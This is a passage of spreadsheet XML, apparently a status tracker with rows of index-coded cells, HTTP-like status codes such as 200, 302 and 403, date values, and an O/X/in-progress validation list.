        <v>500.0</v>
      </c>
      <c r="I22" s="37" t="s">
        <v>164</v>
      </c>
      <c r="J22" s="37"/>
      <c r="K22" s="39">
        <v>46178.39861111111</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1">
      <c r="A23" s="17">
        <v>21.0</v>
      </c>
      <c r="B23" s="35" t="s">
        <v>154</v>
      </c>
      <c r="C23" s="36" t="s">
        <v>78</v>
      </c>
      <c r="D23" s="40" t="s">
        <v>90</v>
      </c>
      <c r="E23" s="37" t="s">
        <v>165</v>
      </c>
      <c r="F23" s="37" t="s">
        <v>157</v>
      </c>
      <c r="G23" s="37" t="s">
        <v>88</v>
      </c>
      <c r="H23" s="37">
        <v>500.0</v>
      </c>
      <c r="I23" s="37" t="s">
        <v>166</v>
      </c>
      <c r="J23" s="37"/>
      <c r="K23" s="39">
        <v>46178.4</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1">
      <c r="A24" s="17">
        <v>22.0</v>
      </c>
      <c r="B24" s="35" t="s">
        <v>154</v>
      </c>
      <c r="C24" s="36" t="s">
        <v>96</v>
      </c>
      <c r="D24" s="40" t="s">
        <v>167</v>
      </c>
      <c r="E24" s="37" t="s">
        <v>168</v>
      </c>
      <c r="F24" s="40" t="s">
        <v>169</v>
      </c>
      <c r="G24" s="37" t="s">
        <v>82</v>
      </c>
      <c r="H24" s="37">
        <v>200.0</v>
      </c>
      <c r="I24" s="41" t="s">
        <v>170</v>
      </c>
      <c r="J24" s="37" t="s">
        <v>84</v>
      </c>
      <c r="K24" s="39">
        <v>46178.40416666667</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1">
      <c r="A25" s="32">
        <v>23.0</v>
      </c>
      <c r="B25" s="35" t="s">
        <v>154</v>
      </c>
      <c r="C25" s="42" t="s">
        <v>171</v>
      </c>
      <c r="D25" s="37" t="s">
        <v>172</v>
      </c>
      <c r="E25" s="37" t="s">
        <v>173</v>
      </c>
      <c r="F25" s="37" t="s">
        <v>174</v>
      </c>
      <c r="G25" s="37" t="s">
        <v>88</v>
      </c>
      <c r="H25" s="37">
        <v>200.0</v>
      </c>
      <c r="I25" s="43" t="s">
        <v>175</v>
      </c>
      <c r="J25" s="40"/>
      <c r="K25" s="39">
        <v>46178.40625</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1">
      <c r="A26" s="32">
        <v>24.0</v>
      </c>
      <c r="B26" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C26" s="45" t="s">
        <v>78</v>
      </c>
      <c r="D26" s="46" t="s">
        <v>177</v>
      </c>
      <c r="E26" s="46" t="s">
        <v>178</v>
      </c>
      <c r="F26" s="46" t="s">
        <v>179</v>
      </c>
      <c r="G26" s="47" t="s">
        <v>88</v>
      </c>
      <c r="H26" s="47">
        <v>200.0</v>
      </c>
      <c r="I26" s="47" t="s">
        <v>180</v>
      </c>
      <c r="J26" s="6"/>
      <c r="K26" s="48">
        <v>46178.416666666664</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1">
      <c r="A27" s="17">
        <v>25.0</v>
      </c>
      <c r="B27" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C27" s="45" t="s">
        <v>78</v>
      </c>
      <c r="D27" s="46" t="s">
        <v>85</v>
      </c>
      <c r="E27" s="46" t="s">
        <v>181</v>
      </c>
      <c r="F27" s="46" t="s">
        <v>182</v>
      </c>
      <c r="G27" s="47" t="s">
        <v>88</v>
      </c>
      <c r="H27" s="47">
        <v>200.0</v>
      </c>
      <c r="I27" s="49" t="s">
        <v>183</v>
      </c>
      <c r="J27" s="8"/>
      <c r="K27" s="50">
        <v>46178.43541666667</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1">
      <c r="A28" s="17">
        <v>26.0</v>
      </c>
      <c r="B28" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C28" s="45" t="s">
        <v>78</v>
      </c>
      <c r="D28" s="46" t="s">
        <v>90</v>
      </c>
      <c r="E28" s="46" t="s">
        <v>184</v>
      </c>
      <c r="F28" s="46" t="s">
        <v>182</v>
      </c>
      <c r="G28" s="47" t="s">
        <v>88</v>
      </c>
      <c r="H28" s="47">
        <v>200.0</v>
      </c>
      <c r="I28" s="49" t="s">
        <v>185</v>
      </c>
      <c r="J28" s="6"/>
      <c r="K28" s="48">
        <v>46178.436111111114</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1">
      <c r="A29" s="17">
        <v>27.0</v>
      </c>
      <c r="B29" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C29" s="45" t="s">
        <v>96</v>
      </c>
      <c r="D29" s="46" t="s">
        <v>186</v>
      </c>
      <c r="E29" s="46" t="s">
        <v>187</v>
      </c>
      <c r="F29" s="46" t="s">
        <v>188</v>
      </c>
      <c r="G29" s="47" t="s">
        <v>121</v>
      </c>
      <c r="H29" s="47">
        <v>200.0</v>
      </c>
      <c r="I29" s="47" t="s">
        <v>189</v>
      </c>
      <c r="J29" s="19" t="s">
        <v>84</v>
      </c>
      <c r="K29" s="51" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1">
      <c r="A30" s="17">
        <v>28.0</v>
      </c>
      <c r="B30" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C30" s="45" t="s">
        <v>101</v>
      </c>
      <c r="D30" s="46" t="s">
        <v>191</v>
      </c>
      <c r="E30" s="46" t="s">
        <v>192</v>
      </c>
      <c r="F30" s="46" t="s">
        <v>193</v>
      </c>
      <c r="G30" s="47" t="s">
        <v>88</v>
      </c>
      <c r="H30" s="47">
        <v>200.0</v>
      </c>
      <c r="I30" s="52" t="s">
        <v>194</v>
      </c>
      <c r="J30" s="14" t="s">
        <v>84</v>
      </c>
      <c r="K30" s="48">
        <v>46178.455555555556</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1">
      <c r="A31" s="17">
        <v>29.0</v>
      </c>
      <c r="B31" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C31" s="45" t="s">
        <v>195</v>
      </c>
      <c r="D31" s="46" t="s">
        <v>196</v>
      </c>
      <c r="E31" s="46" t="s">
        <v>197</v>
      </c>
      <c r="F31" s="46" t="s">
        <v>198</v>
      </c>
      <c r="G31" s="47" t="s">
        <v>82</v>
      </c>
      <c r="H31" s="47">
        <v>302.0</v>
      </c>
      <c r="I31" s="53" t="s">
        <v>199</v>
      </c>
      <c r="J31" s="19" t="s">
        <v>84</v>
      </c>
      <c r="K31" s="19" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1">
      <c r="A32" s="17">
        <v>30.0</v>
      </c>
      <c r="B32" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C32" s="45" t="s">
        <v>201</v>
      </c>
      <c r="D32" s="46" t="s">
        <v>202</v>
      </c>
      <c r="E32" s="46" t="s">
        <v>203</v>
      </c>
      <c r="F32" s="46" t="s">
        <v>204</v>
      </c>
      <c r="G32" s="47" t="s">
        <v>121</v>
      </c>
      <c r="H32" s="47" t="s">
        <v>205</v>
      </c>
      <c r="I32" s="54" t="s">
        <v>206</v>
      </c>
      <c r="J32" s="14"/>
      <c r="K32" s="14" t="s">
        <v>207</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1">
      <c r="A33" s="17">
        <v>31.0</v>
      </c>
      <c r="B33" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C33" s="45" t="s">
        <v>201</v>
      </c>
      <c r="D33" s="46" t="s">
        <v>208</v>
      </c>
      <c r="E33" s="46" t="s">
        <v>209</v>
      </c>
      <c r="F33" s="46" t="s">
        <v>210</v>
      </c>
      <c r="G33" s="47" t="s">
        <v>121</v>
      </c>
      <c r="H33" s="47" t="s">
        <v>205</v>
      </c>
      <c r="I33" s="47" t="s">
        <v>211</v>
      </c>
      <c r="J33" s="19" t="s">
        <v>84</v>
      </c>
      <c r="K33" s="8"/>
    </row>
    <row r="34" ht="15.75" customHeight="1">
      <c r="A34" s="17">
        <v>32.0</v>
      </c>
      <c r="B34" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C34" s="45" t="s">
        <v>212</v>
      </c>
      <c r="D34" s="46" t="s">
        <v>213</v>
      </c>
      <c r="E34" s="46" t="s">
        <v>214</v>
      </c>
      <c r="F34" s="46" t="s">
        <v>215</v>
      </c>
      <c r="G34" s="47" t="s">
        <v>88</v>
      </c>
      <c r="H34" s="47">
        <v>403.0</v>
      </c>
      <c r="I34" s="47" t="s">
        <v>216</v>
      </c>
      <c r="J34" s="6"/>
      <c r="K34" s="6"/>
    </row>
    <row r="35" ht="15.75" customHeight="1">
      <c r="A35" s="17">
        <v>33.0</v>
      </c>
      <c r="B35" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C35" s="45" t="s">
        <v>53</v>
      </c>
      <c r="D35" s="46" t="s">
        <v>217</v>
      </c>
      <c r="E35" s="46" t="s">
        <v>218</v>
      </c>
      <c r="F35" s="46" t="s">
        <v>219</v>
      </c>
      <c r="G35" s="47" t="s">
        <v>88</v>
      </c>
      <c r="H35" s="47">
        <v>403.0</v>
      </c>
      <c r="I35" s="47" t="s">
        <v>220</v>
      </c>
      <c r="J35" s="8"/>
      <c r="K35" s="8"/>
    </row>
    <row r="36" ht="15.75" customHeight="1">
      <c r="A36" s="17">
        <v>34.0</v>
      </c>
      <c r="B36" s="44" t="s">
        <v>176</v>
      </c>
      <c r="C36" s="45" t="s">
        <v>221</v>
      </c>
      <c r="D36" s="46" t="s">
        <v>222</v>
      </c>
      <c r="E36" s="46" t="s">
        <v>223</v>
      </c>
      <c r="F36" s="46" t="s">
        <v>224</v>
      </c>
      <c r="G36" s="47" t="s">
        <v>88</v>
      </c>
      <c r="H36" s="47">
        <v>200.0</v>
      </c>
      <c r="I36" s="54" t="s">
        <v>225</v>
      </c>
      <c r="J36" s="6"/>
      <c r="K36" s="6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$A$2:$K$36">
    <sortState ref="A2:K36">
      <sortCondition ref="A2:A36"/>
      <sortCondition descending="1" ref="K2:K36"/>
    </sortState>
  </autoFilter>
  <mergeCells count="1">
    <mergeCell ref="A1:K1"/>
  </mergeCells>
  <conditionalFormatting sqref="G3:G36">
    <cfRule type="cellIs" dxfId="0" priority="1" operator="equal">
      <formula>"O"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G3:G36">
    <cfRule type="cellIs" dxfId="1" priority="2" operator="equal">
      <formula>"X"</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations>
    <dataValidation type="list" allowBlank="1" sqref="G3:G36">
      <formula1>"O,X,△,진행중"</formula1>
    </dataValidation>
  </dataValidations>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="I9"/>
    <hyperlink r:id="rId2" ref="I12"/>
    <hyperlink r:id="rId3" ref="I17"/>
    <hyperlink r:id="rId4" ref="I20"/>
    <hyperlink r:id="rId5" ref="I21"/>
    <hyperlink r:id="rId6" ref="I32"/>
    <hyperlink r:id="rId7" ref="I36"/>
  </hyperlinks>
  <printOptions/>
  <pageMargins bottom="1.0" footer="0.0" header="0.0" left="0.75" right="0.75" top="1.0"/>
  <pageSetup orientation="landscape"/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2026-05-29T02:39:56Z</dcterms:created>
  <dc:creator>openpyxl</dc:creator>
</cp:coreProperties>
</file>